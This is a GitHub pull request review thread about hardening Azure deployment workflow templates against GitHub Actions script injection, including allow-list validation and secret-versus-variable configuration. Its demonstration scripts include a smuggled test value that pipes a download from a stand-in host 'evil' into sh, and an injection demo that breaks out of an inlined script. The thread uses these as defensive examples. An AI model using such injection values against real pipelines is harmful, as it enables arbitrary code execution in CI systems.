    inputs.confirm and inputs.deployment_id are interpolated directly into a run: script via ${{ ... }}. Because Actions expands those expressions before bash parses the script, a crafted workflow_dispatch input can inject arbitrary shell. Please pass these values through env: (or another non-shell-interpolated channel) and read them from normal shell variables instead.

  2. Unsafe direct interpolation of github.base_ref into shell (.github/skills/git-ape-onboarding/templates/workflows/git-ape-plan.yml:44)
    github.base_ref is used directly inside the git diff command in a run: block. Per GitHub’s Actions hardening guidance, attacker-controlled context values should not be embedded into shell scripts this way. This should also be routed through env: and quoted normally in bash.

  3. Rollback source is wrong for /deploy runs (.github/skills/git-ape-onboarding/templates/workflows/git-ape-deploy.yml, around lines 219-228 and 475-486)
    The comment says the workflow should snapshot the parent commit or origin/main for /deploy comments, but the implementation always reads HEAD~1. On comment-triggered deploys that means rollback can redeploy an earlier PR commit that was never the last known-good state, instead of rolling back to main. That is especially risky on multi-commit PRs. Please branch this logic so /deploy captures from origin/main (or another authoritative deployed baseline) before using it for rollback.

One additional hardening nit: git-ape-verify.yml also embeds secret values directly into shell conditionals (${{ secrets.AZURE_CLIENT_ID }} etc.). I would strongly prefer converting those checks to env booleans/variables as well.
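
As a rough illustration of the env-boolean approach suggested here, the check can run on "true"/"false" flags without the secret values ever appearing in script source. The function name `missing_settings` and the message wording are hypothetical. In a workflow, the three flags would be computed by expressions under `env:`.

```bash
#!/usr/bin/env bash
# Hypothetical helper: list required settings whose presence flag is not
# "true". Only the flags reach the shell, never the secret values.
missing_settings() {
  local has_client_id="$1" has_tenant_id="$2" has_subscription_id="$3"
  local missing=()
  [[ "$has_client_id" != "true" ]] && missing+=("AZURE_CLIENT_ID (secret)")
  [[ "$has_tenant_id" != "true" ]] && missing+=("AZURE_TENANT_ID (secret)")
  [[ "$has_subscription_id" != "true" ]] && missing+=("AZURE_SUBSCRIPTION_ID (variable)")
  if (( ${#missing[@]} > 0 )); then
    printf '%s\n' "${missing[@]}"
    return 1
  fi
  return 0
}

# Example: subscription variable not configured.
missing_settings true true false || echo "setup incomplete"
```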

Once the injection issues and rollback baseline are fixed, I’d be happy to re-review.

arnaudlh added 2 commits June 4, 2026 10:19
Address PR review on the git-ape-onboarding workflow templates:

- Route attacker-controllable inputs (github.base_ref, workflow_dispatch
  inputs, JSON step outputs) through env: and read them as quoted shell
  variables to close script-injection vectors (plan, destroy).
- plan: compute the PR diff against origin/$BASE_REF instead of an
  unsanitised interpolation.
- deploy: derive the rollback baseline from HEAD~1 (push) or origin/main
  (/deploy comment); pass stack_id/managed_resources via env and validate
  the managed_resources JSON before jq consumes it.
- destroy: make teardown Deployment-Stacks-only with a guarded legacy
  resource-group fallback; emit explicit legacy/fallback_rg outputs.
- verify: gate required secrets/variable via env booleans; check the
  AZURE_SUBSCRIPTION_ID variable; align the scaffolded WORKFLOWS list with
  the scaffolder (drop ttl-reaper, add verify, use drift.lock.yml).
- plan: remove the unreachable what-if render branch.

Regenerate website workflow docs.

AZURE_SUBSCRIPTION_ID is consumed via vars. in every scaffolded workflow, so
document it as a GitHub repository/environment variable (not a secret).
AZURE_CLIENT_ID and AZURE_TENANT_ID remain secrets. Fix the OIDC snippet in
both copilot-instructions templates to use vars.AZURE_SUBSCRIPTION_ID.
@github-actions
Contributor

github-actions Bot commented Jun 4, 2026

⚠️ Documentation Staleness Warning

Source files (agents, skills, workflows, or config) changed in this PR, but the generated documentation is out of date.

Changed docs that need regeneration:

  • website/docs/workflows/git-ape-release.md

To fix: Run the following command and commit the results:

node scripts/generate-docs.js

This is an advisory check — it does not block the PR.

@arnaudlh
Member Author

arnaudlh commented Jun 4, 2026

Thanks for the thorough review, @sendtoshailesh. All four points are addressed in d6b41dc (workflow templates) and 67005a7 (docs). Summary:

1. Command injection in manual destroy path (git-ape-destroy.yml)
workflow_dispatch inputs are no longer interpolated into the script. The "Find destroy-requested deployments" step now exposes EVENT_NAME / INPUT_CONFIRM / INPUT_DEPLOYMENT_ID via env: and builds the id array with jq -n -c --arg id "$INPUT_DEPLOYMENT_ID" '[$id]', so nothing attacker-controllable reaches the shell unquoted.

2. Unsafe interpolation of github.base_ref (git-ape-plan.yml)
The "Find deployment directories with changes" step now sets env: BASE_REF: ${{ github.base_ref }} and computes the diff with git diff --name-only "origin/${BASE_REF}...HEAD", quoting the value normally.

3. Rollback baseline wrong for /deploy runs (git-ape-deploy.yml)
The "Capture pre-deploy state" step now branches on the trigger: HEAD~1 for push, and for /deploy comments it does git fetch origin main --depth=1 and uses BASELINE_REF="origin/main", then git show "$BASELINE_REF:$DEPLOY_DIR/template.json". Multi-commit PRs no longer roll back to an arbitrary earlier PR commit.

Hardening nit — git-ape-verify.yml secret conditionals
Converted to env: booleans: HAS_CLIENT_ID: ${{ secrets.AZURE_CLIENT_ID != '' }} (and tenant), with HAS_SUBSCRIPTION_ID: ${{ vars.AZURE_SUBSCRIPTION_ID != '' }}; the checks now test [[ "$HAS_*" != "true" ]]. The "Verify Azure access" step reads AZURE_CLIENT_ID from env: too.

While in here I also addressed the Copilot review threads (managed_resources JSON via env: + jq validation, the rollback HEAD~1 overlap, and an unreachable what-if render branch), made git-ape-destroy Deployment-Stacks-only with a guarded legacy resource-group fallback, aligned the verify scaffold list with the scaffolder (dropped ttl-reaper, added verify, switched to drift.lock.yml), and reconciled AZURE_SUBSCRIPTION_ID as a GitHub variable (it is consumed via vars. in every scaffolded workflow) across the docs and OIDC snippets.

Ready for re-review.

@arnaudlh arnaudlh requested a review from sendtoshailesh June 4, 2026 02:52
Contributor

@sendtoshailesh sendtoshailesh left a comment


Follow-up review:

Previously raised issues:

  • ✅ Fixed: git-ape-destroy.yml no longer interpolates inputs.* directly into shell; the workflow_dispatch inputs are routed via env and JSON-encoded with jq before use.
  • ✅ Fixed: git-ape-plan.yml no longer inlines ${{ github.base_ref }} in the shell; it is passed through env.BASE_REF first.
  • ✅ Fixed: git-ape-deploy.yml now uses origin/main for /deploy rollback baselines instead of always assuming HEAD~1; the push path still uses HEAD~1, which is the previous main commit after merge.
  • ✅ Fixed: git-ape-verify.yml moved the secret checks to env booleans instead of embedding ${{ secrets.* }} directly in shell conditionals.

New issues found:

  • ❌ Blocking: matrix.deployment_id is still derived from attacker-controlled deployment directory names and interpolated directly into run: blocks / JS string literals in the plan, deploy, and destroy templates. That reintroduces shell / script injection via paths under .azure/deployments/*/.
  • ⚠️ Non-blocking: the /deploy comment path checks approval state, but it still does not verify that the commenter is an authorized collaborator/member before triggering deployment.
  • ⚠️ Non-blocking: both deploy and destroy still swallow git push failures after updating state.json / metadata.json, which can leave Azure state changed without the repo state being persisted.

Overall verdict: the original blockers are resolved, but the new matrix.deployment_id injection path is still a release-blocking security issue, so this PR is not merge-ready yet.

arnaudlh added 3 commits June 4, 2026 19:10
…t_id injection

matrix.deployment_id is derived from attacker-controllable .azure/deployments/*/ directory names and was interpolated directly into run: bash blocks and github-script JS string literals across the plan, deploy, and destroy workflow templates.

Route it through job-level env (DEPLOYMENT_ID) so run blocks reference $DEPLOYMENT_ID and github-script reads process.env.DEPLOYMENT_ID, and reject any directory name outside ^[A-Za-z0-9._-]+$ at the detect step (defense in depth, also makes derived deploy_dir provably safe).
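
The allow-list check named in this commit message can be sketched in bash as follows. Only the pattern `^[A-Za-z0-9._-]+$` comes from the commit message. The function name `is_safe_deployment_id` and the sample inputs are hypothetical.

```bash
#!/usr/bin/env bash
# Hypothetical helper: accept only directory names matching ^[A-Za-z0-9._-]+$.
is_safe_deployment_id() {
  local id="$1"
  local pattern='^[A-Za-z0-9._-]+$'
  # Keep the pattern in a variable and leave it unquoted so bash treats it
  # as a regular expression rather than a literal string.
  [[ "$id" =~ $pattern ]]
}

for candidate in 'deploy-20260506-001' 'x"; curl evil | sh; "' ''; do
  if is_safe_deployment_id "$candidate"; then
    echo "accept: $candidate"
  else
    echo "reject: $candidate"
  fi
done
```

As quoted, the pattern would also accept `.` and `..`. Whether the template handles those names separately is not stated in this thread.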
…e push

The /deploy comment trigger cannot reliably verify the commenter's
authorization, so deployment is now gated solely on merge to main (which
already requires PR review + approval via branch protection). Removes the
issue_comment trigger, the check-comment-trigger job, and all PR-head-ref
checkout paths. Also fails loud (exit 1) instead of swallowing git push
failures when committing deployment/teardown state back to main.
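
A minimal sketch of the "fail loud" behaviour described in this commit message, assuming the state commit is pushed by a single command. The wrapper name `persist_state` and the message text are hypothetical. `::error::` is the GitHub Actions workflow command for error annotations.

```bash
#!/usr/bin/env bash
# Hypothetical helper: run a state-persisting command and propagate its
# failure instead of masking it with "|| true".
persist_state() {
  # "$@" is the command to run, e.g. a git push in a real workflow step.
  if ! "$@"; then
    echo "::error::Failed to persist state; Azure may have changed without the repo being updated" >&2
    return 1
  fi
  echo "state persisted"
}

persist_state true    # prints: state persisted
persist_state false || echo "workflow step would exit 1 here"
```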
@arnaudlh arnaudlh requested a review from sendtoshailesh June 4, 2026 11:20
Contributor

@sendtoshailesh sendtoshailesh left a comment


Follow-up review:

Previously raised issues:

  • ✅ Fixed: matrix.deployment_id is now validated against ^[A-Za-z0-9._-]+$ before entering the matrix and routed through env.DEPLOYMENT_ID / process.env.DEPLOYMENT_ID in the plan, deploy, and destroy templates, so the earlier matrix.deployment_id shell/JS injection path is closed.
  • ✅ Fixed: the /deploy comment path is gone entirely from git-ape-deploy.yml, so there is no longer an unauthenticated comment-triggered deployment path to authorize.
  • ✅ Fixed: deploy and destroy now fail the workflow if the post-state git push fails instead of silently swallowing that error.

New issues found:

  • ❌ Blocking: untrusted values read from parameters.json are still interpolated directly into run: scripts via ${{ ... }} in the workflow templates, which reintroduces the same GitHub Actions expression-to-shell injection class under a different input. Examples: git-ape-plan.yml uses ${{ steps.params.outputs.location }} in shell at lines 157, 414, and 455; git-ape-deploy.yml uses ${{ steps.params.outputs.location }}, ${{ steps.params.outputs.project }}, and ${{ steps.params.outputs.environment }} in shell/JQ argument positions at lines 175, 178, 241, 244-245, 258, 420, and 498-500. These values come from attacker-controlled PR content (parameters.json) and need the same treatment as deployment_id: validate if needed, pass through env:, and reference normal shell variables instead of inlining ${{ ... }} into script source.
  • ⚠️ Non-blocking: git-ape-plan.yml still tells reviewers to comment /deploy (Plan Comment step, line 738), but that trigger has been intentionally removed. The PR guidance should be updated to avoid instructing users to use a nonexistent path.

Overall verdict:
The previously raised issues are resolved, but the new ${{ steps.params.outputs.* }} injection path is still a release-blocking security issue, so this PR is not merge-ready yet.

…ection

Untrusted location/project/environment values read from parameters.json
were interpolated directly into run: script bodies via ${{ steps.params.outputs.* }},
the same expression-to-shell injection class already fixed for deployment_id.
Route them through step-level env: blocks and reference $LOCATION/$PROJECT/$ENVIRONMENT
shell variables instead. Also drop the stale /deploy reviewer instruction in
git-ape-plan.yml (that trigger was removed). Regenerated workflow docs.
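To illustrate why routing through `env:` closes this class of injection, here is a small sketch that contrasts the two forms. The hostile value and the `show_arg` helper are hypothetical; the inlined case is simulated by pasting the value into script text before the shell parses it, which is how a `${{ ... }}` expression inside `run:` behaves.

```shell
#!/usr/bin/env bash
# Hypothetical hostile value, standing in for a field read from parameters.json.
export LOCATION='eastus"; echo INJECTED; echo "'

# Stand-in for a CLI call: prints the single argument it receives.
show_arg() {
  printf 'argument: <%s>\n' "$1"
}

# Env-routed form: the script text is fixed, and the quoted expansion keeps
# the whole value as one argument.
show_arg "$LOCATION"

# Inlined form, simulated: the value is pasted into the script source before
# the shell parses it, so the embedded quotes end the string early.
rendered="printf '%s\n' \"${LOCATION}\""
bash -c "$rendered"
```

In the first call the payload stays data; in the second, `echo INJECTED` runs as its own command.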
@arnaudlh
Member Author

arnaudlh commented Jun 4, 2026

@sendtoshailesh Thanks for the thorough re-review. Fixed the remaining injection in dce5833e.

Blocking item — ${{ steps.params.outputs.* }} in run: bodies: location, project, and environment are read from parameters.json (attacker-controllable) and were being interpolated directly into shell/jq script bodies — the same expression-to-shell injection class as the earlier deployment_id finding. They are now routed through step-level env: blocks and referenced as "$LOCATION" / "$PROJECT" / "$ENVIRONMENT" shell variables in both git-ape-deploy.yml (validate, deploy, rollback, and save-state steps) and git-ape-plan.yml (cost, validate, what-if steps). No untrusted value is inlined into a run: body anymore. (deploy_dir is left as-is since it is derived solely from the already-validated $DEPLOYMENT_ID and contains no shell metacharacters.)

Non-blocking item — stale /deploy instruction: removed the 3. Or comment /deploy line from the Plan Comment step in git-ape-plan.yml; merge-to-deploy is the only trigger now.

actionlint (with embedded shellcheck) reports no injection findings on either template — only pre-existing SC2129 redirect-style suggestions unrelated to this change. Workflow docs regenerated from the templates.

@arnaudlh arnaudlh requested a review from sendtoshailesh June 4, 2026 11:30
arnaudlh added 3 commits June 4, 2026 19:38
…rhaul

# Conflicts:
#	.github/agents/git-ape.agent.md
#	.github/copilot-instructions.md
#	.github/evals/manifest.yaml
#	.github/workflows/git-ape-deploy.exampleyml
#	.github/workflows/git-ape-destroy.exampleyml
#	website/docs/agents/git-ape.md
#	website/docs/workflows/git-ape-deploy.md
#	website/docs/workflows/git-ape-destroy.md
Merge resolution updated the .github/copilot-instructions.md mirror to the
stack-based deployment flow (dropping the /deploy trigger). Propagate the
same content to the canonical templates/copilot-instructions.md so the
onboarding template-check (bash + pwsh) passes.

Regenerated from sources updated by the upstream/main merge (azure-resource-deployer
and azure-template-generator agents now delegate to skills; lock workflow metadata).
Contributor

@sendtoshailesh sendtoshailesh left a comment

Round 4 follow-up review:

Previously raised issues:

  • ✅ Fixed: untrusted parameters.json values (location, project, environment) are now routed through env: before use in shell steps instead of being interpolated directly into run: blocks.
  • ✅ Fixed: the stale /deploy reference was removed from the plan comment path.

Conflict resolution assessment:

  • ✅ Merge resolution looks clean overall. I did not find conflict markers or accidental duplicate sections in the changed templates/workflows, the key workflow YAML files parse successfully, and the onboarding template sync check passes.

New issues found:

  • ❌ Blocking: website/docs/getting-started/onboarding.md still tells users to configure AZURE_SUBSCRIPTION_ID as a GitHub secret (gh secret set at lines 364-366, 383-391), but the scaffolded workflows and verify flow now read it from vars.AZURE_SUBSCRIPTION_ID as a variable. A user following the updated onboarding docs will end up with a broken setup: verify/deploy read from vars, but the docs populate secrets. Given this PR is specifically overhauling onboarding/scaffolding, that documentation contract needs to be consistent before merge.
  • ⚠️ Non-blocking: git-ape-verify.yml and its generated docs still say Merge or comment /deploy to deploy, and the summary still says secret(s) missing even though one of the required values is now a variable. That guidance is stale/misleading, though the actual deploy trigger removal in plan/deploy is correct.

Overall verdict:
The round-3 blockers are fixed and the merge conflict resolution looks solid, but the onboarding docs still misconfigure AZURE_SUBSCRIPTION_ID, so I don’t think this is merge-ready yet. Once the docs and template guidance are aligned with the new variable-based contract, I’d be happy to re-review.

Round 4 review (sendtoshailesh):

- Blocking: onboarding docs configured AZURE_SUBSCRIPTION_ID via 'gh secret set',
  but the scaffolded plan/deploy/destroy/verify workflows read it from
  vars.AZURE_SUBSCRIPTION_ID. Switch the single- and multi-environment setup
  steps to 'gh variable set' so the documented contract matches the workflows.
  AZURE_CLIENT_ID and AZURE_TENANT_ID remain secrets.
- Non-blocking: git-ape-verify.yml summary said 'secret(s) missing' (one value
  is now a variable) and 'Merge or comment /deploy to deploy' (the /deploy
  trigger was removed). Reworded to 'required value(s) missing' and
  'Merge to main to deploy'; renamed the check step accordingly.

Regenerated git-ape-verify.md from the updated template.
@arnaudlh
Member Author

arnaudlh commented Jun 5, 2026

@sendtoshailesh Thanks for the round 4 review. Both points addressed in de50e714.

Blocking — AZURE_SUBSCRIPTION_ID documented as a secret: website/docs/getting-started/onboarding.md now sets it via gh variable set (single- and multi-environment paths, including the azure-destroy environment), matching the scaffolded plan/deploy/destroy/verify workflows that read vars.AZURE_SUBSCRIPTION_ID. AZURE_CLIENT_ID and AZURE_TENANT_ID remain secrets. The "Set secrets" heading and intro now state explicitly which value is a secret vs. a variable.

Non-blocking — stale git-ape-verify.yml guidance: the summary line now reads required value(s) missing instead of secret(s) missing, the next-steps line reads Merge to main to deploy (the /deploy trigger is gone), and the check step is renamed to Check required secrets and variables. Regenerated git-ape-verify.md from the template.

The template ↔ mirror sync check passes locally for both bash and pwsh.
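The secret/variable split described in this comment might look roughly like the sketch below. The ID values are placeholders and the `run` dry-run wrapper is hypothetical; `gh variable set` and `gh secret set` with `--body` are the GitHub CLI commands the docs refer to. For an environment-scoped value such as the azure-destroy environment, both commands also accept `--env`.

```shell
#!/usr/bin/env bash
# Placeholder values for illustration only; substitute real IDs.
SUBSCRIPTION_ID='00000000-0000-0000-0000-000000000000'
CLIENT_ID='11111111-1111-1111-1111-111111111111'
TENANT_ID='22222222-2222-2222-2222-222222222222'

# Hypothetical dry-run wrapper: prints each command unless APPLY=1 is set.
run() {
  if [ "${APPLY:-0}" = "1" ]; then
    "$@"
  else
    printf '%s\n' "$*"
  fi
}

# Read by the workflows as vars.AZURE_SUBSCRIPTION_ID, so it is a variable.
run gh variable set AZURE_SUBSCRIPTION_ID --body "$SUBSCRIPTION_ID"

# These two remain secrets.
run gh secret set AZURE_CLIENT_ID --body "$CLIENT_ID"
run gh secret set AZURE_TENANT_ID --body "$TENANT_ID"
```

Running it without `APPLY=1` only prints the three commands, which makes it easy to check the split before touching the repository settings.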

Contributor

@sendtoshailesh sendtoshailesh left a comment

Round 5 follow-up review:

Verified fixes from round 4:

  • website/docs/getting-started/onboarding.md now treats AZURE_SUBSCRIPTION_ID as a GitHub variable (gh variable set ...) rather than a secret.
  • git-ape-verify and its generated docs no longer mention /deploy, and the summary wording is now required value(s) missing.

One issue still remains in the current diff:

  • .github/agents/azure-resource-deployer.agent.md:78, website/docs/agents/azure-resource-deployer.md:103, and website/docs/use-cases/cicd-pipeline.md:100 still show subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }}. That is now inconsistent with the onboarding/scaffolded workflow contract, which uses vars.AZURE_SUBSCRIPTION_ID (for example in .github/copilot-instructions.md and the generated workflow templates). Because these docs/agent definitions are part of this PR, they should be updated to the variable-based form before merge.

…workflows

Round 5 review (sendtoshailesh): the azure-resource-deployer agent definition
and the cicd-pipeline / drift-detection example workflows still passed
subscription-id from secrets.AZURE_SUBSCRIPTION_ID, contradicting the
variable-based contract used by the scaffolded workflows and copilot-instructions
(vars.AZURE_SUBSCRIPTION_ID).

Switch all three azure/login@v2 examples to vars.AZURE_SUBSCRIPTION_ID
(client-id and tenant-id remain secrets). Regenerated the agent doc from source.
@arnaudlh
Member Author

arnaudlh commented Jun 8, 2026

@sendtoshailesh Round 5 issue fixed in 8c1ca1bc.

All three azure/login@v2 examples now read subscription-id: ${{ vars.AZURE_SUBSCRIPTION_ID }}, matching the scaffolded workflows and .github/copilot-instructions.md:

  • .github/agents/azure-resource-deployer.agent.md:78 (source) → regenerated website/docs/agents/azure-resource-deployer.md:103
  • website/docs/use-cases/cicd-pipeline.md:100
  • website/docs/deployment/drift-detection.md:423

client-id and tenant-id remain secrets.*.

I also swept the whole repo: a repo-wide grep confirms zero remaining secrets.AZURE_SUBSCRIPTION_ID references — every read is now vars.AZURE_SUBSCRIPTION_ID and every setup uses gh variable set. The template ↔ mirror sync check passes (bash + pwsh), docs regenerated, and no conflict markers remain in the tree.

Ready for re-review.
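A repo-wide sweep like the one mentioned above could be scripted along these lines. This is a sketch under assumptions: the helper name `no_secret_refs` is hypothetical, and the demo runs against a throwaway temp directory rather than the real repository.

```shell
#!/usr/bin/env bash
# Hypothetical helper: succeed only when nothing under the given directory
# still references the secret form of the subscription ID.
no_secret_refs() {
  local root="${1:-.}"
  # grep exits 0 when it finds a match, so the result is inverted;
  # -F treats the pattern as a fixed string rather than a regex.
  ! grep -rnF --exclude-dir=.git 'secrets.AZURE_SUBSCRIPTION_ID' "$root"
}

# Demo against a temporary directory with one clean and one stale file.
demo="$(mktemp -d)"
echo 'subscription-id: ${{ vars.AZURE_SUBSCRIPTION_ID }}' > "$demo/ok.yml"
no_secret_refs "$demo" && echo "clean"
echo 'subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }}' > "$demo/stale.yml"
no_secret_refs "$demo" || echo "stale references found"
rm -rf "$demo"
```

Because the helper's exit status reflects the result, it could also serve as a CI guard against the secret form being reintroduced.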

@arnaudlh arnaudlh requested a review from sendtoshailesh June 8, 2026 09:23
Contributor

@sendtoshailesh sendtoshailesh left a comment

Round 6 follow-up: new commits were pushed after the previous requested-changes review, and the remaining round-5 blocker is now resolved.

Across rounds 1-4, the earlier issues had already been fixed. In round 5, the only outstanding blocker was the inconsistent use of secrets.AZURE_SUBSCRIPTION_ID in three docs/agent examples. I re-checked the updated PR and confirmed those references now use vars.AZURE_SUBSCRIPTION_ID in:

  • .github/agents/azure-resource-deployer.agent.md
  • website/docs/agents/azure-resource-deployer.md
  • website/docs/use-cases/cicd-pipeline.md

I also searched the full current PR diff for any remaining secrets.AZURE_SUBSCRIPTION_ID references and found only removed lines, with the live additions consistently using vars.AZURE_SUBSCRIPTION_ID. I did a fresh scan of the current diff as well and did not find any new issues.

All issues raised across all six review rounds are now resolved. Approving.

@arnaudlh arnaudlh merged commit d1bf697 into main Jun 8, 2026
32 checks passed
@arnaudlh arnaudlh deleted the feat/onboarding-overhaul branch June 8, 2026 10:36